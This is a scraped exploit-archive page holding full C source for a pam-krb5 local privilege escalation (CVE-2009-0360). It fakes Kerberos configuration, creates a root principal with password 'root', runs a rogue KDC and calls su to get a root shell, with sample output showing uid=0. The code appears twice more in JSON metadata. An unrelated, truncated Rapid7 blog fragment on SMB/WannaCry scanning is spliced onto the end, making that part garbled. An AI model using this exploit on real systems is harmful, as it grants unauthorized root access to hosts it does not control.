pam-krb5 < 3.13 Local Privilege Escalation Exploit
2009-03-29T00:00:00
ID 1337DAY-ID-7919 Type zdt Reporter Jon Oberheide Modified 2009-03-29T00:00:00
Description
Exploit for linux platform in category local exploits
==================================================
pam-krb5 < 3.13 Local Privilege Escalation Exploit
==================================================
/*
* cve-2009-0360.c
*
* pam-krb5 < 3.13 local privilege escalation
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
*
* pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
* initialize the Kerberos libraries for setuid use, which allows local
* users to gain privileges by pointing an environment variable to a
* modified Kerberos configuration file, and then launching a PAM-based
* setuid application.
*
* Usage:
*
* $ gcc cve-2009-0360.c -o cve-2009-0360
* $ ./cve-2009-0360
* [+] creating krb5.conf
* [+] creating kdc.conf
* [+] creating kerberos database
* Loading random data
* Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
* master key name 'K/[email protected]'
* [+] adding principal [email protected]
* Authenticating as principal [email protected] with password.
* Enter KDC database master key:
* WARNING: no policy specified for [email protected]; defaulting to no policy
* Principal "[email protected]" created.
* [+] launching krb5kdc on 141.212.110.163:6666
* [+] launching su with fake KDC configuration
* [+] enter "root" at the password prompt
* Password:
* # id
* uid=0(root) gid=0(root) ...
*
* Notes:
*
* This exploit will result in local privilege escalation on hosts that use
* the pam-krb5 module for su authentication. Check the su and system-auth
* PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
* Some customization of the defined constants and paths may be necessary
* for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
* an active non-loopback interface on the target machine.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#define REALM "TEST.COM"
#define FAKE_KDC_HOST "141.212.110.163"
#define FAKE_KDC_PORT "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR "/tmp/cve-2009-0360"
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"
#define KRB5_CONF \
"[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
" = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
"default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
"\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM
#define KDC_CONF \
"[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
" = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
"FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
"\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
"\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"
int
main(void)
{
int ret;
FILE *fp;
char *err;
ret = mkdir(TMP_DIR, 0755);
if (ret == -1 && errno != EEXIST) {
err = "cannot create TMP_DIR";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
printf("[+] creating krb5.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/krb5.conf", "w");
if (!fp) {
err = "cannot open krb5.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
fclose(fp);
printf("[+] creating kdc.conf\n");
sleep(1);
fp = fopen(TMP_DIR "/kdc.conf", "w");
if (!fp) {
err = "cannot open kdc.conf";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
fclose(fp);
chdir(TMP_DIR);
printf("[+] creating kerberos database\n");
sleep(1);
ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
"/stash -r " REALM " -s -P \"\"");
if (WEXITSTATUS(ret) != 0) {
err = "kdb5_util command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
sleep(1);
ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
" -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
"-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
if (WEXITSTATUS(ret) != 0) {
err = "kadmin.local command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
sleep(1);
ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
" -d " TMP_DIR "/principal -r " REALM);
if (WEXITSTATUS(ret) != 0) {
err = "krb5kdc command returned non-zero";
printf("[-] Error: %s, continuing exploit anyway\n", err);
}
printf("[+] launching su with fake KDC configuration\n");
sleep(1);
printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
sleep(1);
system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");
return 0;
}
# 0day.today [2018-04-10] #
{"hash": "0dd6b4b0675de7a8f74fbbadd5503e55028dccaa92a1e13eb9398bb84a1d4e7e", "id": "1337DAY-ID-7919", "lastseen": "2018-04-10T04:21:13", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "099ca755b8ab6cf6a0c4e75e8826fc04", "key": "href"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "f2c4c1e19174231e2aa237e48925be06", "key": "sourceData"}, {"hash": "30eb236def769c326b93fe760265201a", "key": "sourceHref"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-04-10T04:21:13"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7686740988509691507"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7919", "SECURITYVULNS:VULN:4294"]}], "modified": "2018-04-10T04:21:13"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "b0e1c4707c93124c7b0478ba7c711885a730fbf860d2794aad74bf16ebc63d72", "id": "1337DAY-ID-7919", "lastseen": "2016-04-20T01:11:32", "enchantments": {"score": {"value": 1.3, "vector": "AV:L/AC:M/Au:M/C:N/I:P/A:N/", "modified": "2016-04-20T01:11:32"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8ebcd5c1bbda80c80d5c98bac81c73ce", "key": "reporter"}, {"hash": "b2f2be0cfe67d31002bc18594e1e3294", "key": "href"}, {"hash": "0d6bf551d9e5915315f9f0cdd6141c3e", "key": "title"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "21f3e22aeb018d74a764d53bec87e567", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "modified"}, {"hash": "bf6641a2f2795b56834efb7048c91788", "key": "sourceHref"}, {"hash": "4390347e176ff2a1b7f19cc23c4a9180", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7919", "description": "Exploit for linux platform in category local exploits", "viewCount": 0, "title": "pam-krb5 < 3.13 Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. \r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/M@TEST.COM'\r\n * [+] adding principal root@TEST.COM\r\n * Authenticating as principal root@TEST.COM with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for root@TEST.COM; defaulting to no policy\r\n * Principal \"root@TEST.COM\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "http://0day.today/exploit/description/7919"}, "lastseen": "2016-04-20T01:11:32", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================\r\npam-krb5 < 3.13 Local Privilege Escalation Exploit\r\n==================================================\r\n\r\n\r\n/*\r\n * cve-2009-0360.c\r\n *\r\n * pam-krb5 < 3.13 local privilege escalation\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360\r\n *\r\n * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly \r\n * initialize the Kerberos libraries for setuid use, which allows local \r\n * users to gain privileges by pointing an environment variable to a \r\n * modified Kerberos configuration file, and then launching a PAM-based \r\n * setuid application. \r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0360.c -o cve-2009-0360\r\n * $ ./cve-2009-0360\r\n * [+] creating krb5.conf\r\n * [+] creating kdc.conf\r\n * [+] creating kerberos database\r\n * Loading random data\r\n * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',\r\n * master key name 'K/[email\u00a0protected]'\r\n * [+] adding principal [email\u00a0protected]\r\n * Authenticating as principal [email\u00a0protected] with password.\r\n * Enter KDC database master key: \r\n * WARNING: no policy specified for [email\u00a0protected]; defaulting to no policy\r\n * Principal \"[email\u00a0protected]\" created.\r\n * [+] launching krb5kdc on 141.212.110.163:6666\r\n * [+] launching su with fake KDC configuration\r\n * [+] enter \"root\" at the password prompt\r\n * Password: \r\n * # id\r\n * uid=0(root) gid=0(root) ...\r\n *\r\n * Notes:\r\n *\r\n * This exploit will result in local privilege escalation on hosts that use \r\n * the pam-krb5 module for su authentication. Check the su and system-auth\r\n * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.\r\n * Some customization of the defined constants and paths may be necessary \r\n * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of\r\n * an active non-loopback interface on the target machine.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define REALM \"TEST.COM\"\r\n#define FAKE_KDC_HOST \"141.212.110.163\"\r\n#define FAKE_KDC_PORT \"6666\"\r\n#define PRINCIPAL_NAME \"root\"\r\n#define PRINCIPAL_PASS \"root\"\r\n#define TMP_DIR \"/tmp/cve-2009-0360\"\r\n#define KUTIL_PATH \"/usr/sbin/kdb5_util\"\r\n#define KADMIN_PATH \"/usr/sbin/kadmin.local\"\r\n#define KRB5KDC_PATH \"/usr/sbin/krb5kdc\"\r\n\r\n#define KRB5_CONF \\\r\n \"[libdefaults]\\n\\tdefault_realm = \" REALM \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tadmin_server = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\\t\\t\" \\\r\n \"default_domain = \" REALM \"\\n\\t\\tkdc = \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \\\r\n \"\\n\\t}\\n\\n[domain_realm]\\n\\t.\" REALM \" = \" REALM \"\\n\\t\" REALM \" = \" REALM\r\n\r\n#define KDC_CONF \\\r\n \"[kdcdefaults]\\n\\tkdc_ports = \" FAKE_KDC_PORT \"\\n\\n[realms]\\n\\t\" REALM \\\r\n \" = {\\n\\t\\tdatabase_name = \" TMP_DIR \"/principal\\n\\t\\tadmin_keytab = \" \\\r\n \"FILE:\" TMP_DIR \"/kadm5.keytab\\n\\t\\tacl_file = \" TMP_DIR \"/kadm5.acl\" \\\r\n \"\\n\\t\\tkey_stash_file = \" TMP_DIR \"/stash\\n\\t\\tkdc_ports = \" FAKE_KDC_PORT \\\r\n \"\\n\\t\\tmax_life = 10h 0m 0s\\n\\t\\tmax_renewable_life = 7d 0h 0m 0s\\n\\t}\"\r\n\r\nint\r\nmain(void)\r\n{\r\n int ret;\r\n FILE *fp;\r\n char *err;\r\n\r\n ret = mkdir(TMP_DIR, 0755);\r\n if (ret == -1 && errno != EEXIST) {\r\n err = \"cannot create TMP_DIR\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n\r\n printf(\"[+] creating krb5.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/krb5.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open krb5.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);\r\n fclose(fp);\r\n\r\n printf(\"[+] creating kdc.conf\\n\");\r\n sleep(1);\r\n\r\n fp = fopen(TMP_DIR \"/kdc.conf\", \"w\");\r\n if (!fp) {\r\n err = \"cannot open kdc.conf\";\r\n printf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\r\n return 1;\r\n }\r\n fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);\r\n fclose(fp);\r\n\r\n chdir(TMP_DIR);\r\n\r\n printf(\"[+] creating kerberos database\\n\");\r\n sleep(1);\r\n\r\n ret = system(KUTIL_PATH \" create -d \" TMP_DIR \"/principal -sf \" TMP_DIR \\\r\n \"/stash -r \" REALM \" -s -P \\\"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kdb5_util command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] adding principal \" PRINCIPAL_NAME \"@\" REALM \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"echo \\\"\\\" | \" KADMIN_PATH \" -m -p \" PRINCIPAL_NAME \"@\" REALM \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM \" -q \\\"add_principal \" \\\r\n \"-pw \" PRINCIPAL_PASS \" \" PRINCIPAL_NAME \"@\" REALM \"\\\"\");\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"kadmin.local command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching krb5kdc on \" FAKE_KDC_HOST \":\" FAKE_KDC_PORT \"\\n\");\r\n sleep(1);\r\n\r\n ret = system(\"KRB5_KDC_PROFILE=\\\"\" TMP_DIR \"/kdc.conf\\\" \" KRB5KDC_PATH \\\r\n \" -d \" TMP_DIR \"/principal -r \" REALM);\r\n if (WEXITSTATUS(ret) != 0) {\r\n err = \"krb5kdc command returned non-zero\";\r\n printf(\"[-] Error: %s, continuing exploit anyway\\n\", err);\r\n }\r\n\r\n printf(\"[+] launching su with fake KDC configuration\\n\");\r\n sleep(1);\r\n printf(\"[+] enter \\\"\" PRINCIPAL_PASS \"\\\" at the password prompt\\n\");\r\n sleep(1);\r\n\r\n system(\"KRB5_CONFIG=\\\"\" TMP_DIR \"/krb5.conf\\\" su\");\r\n\r\n return 0;\r\n}\r\n\r\n\r \n\n# 0day.today [2018-04-10] #", "published": "2009-03-29T00:00:00", "references": [], "reporter": "Jon Oberheide", "modified": "2009-03-29T00:00:00", "href": "https://0day.today/exploit/description/7919"}
{"rapid7community": [{"lastseen": "2017-06-24T01:16:32", "bulletinFamily": "blog", "description": "<!-- [DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7’s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system’s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">—MS17-010—which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “Double Pulsar and WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" 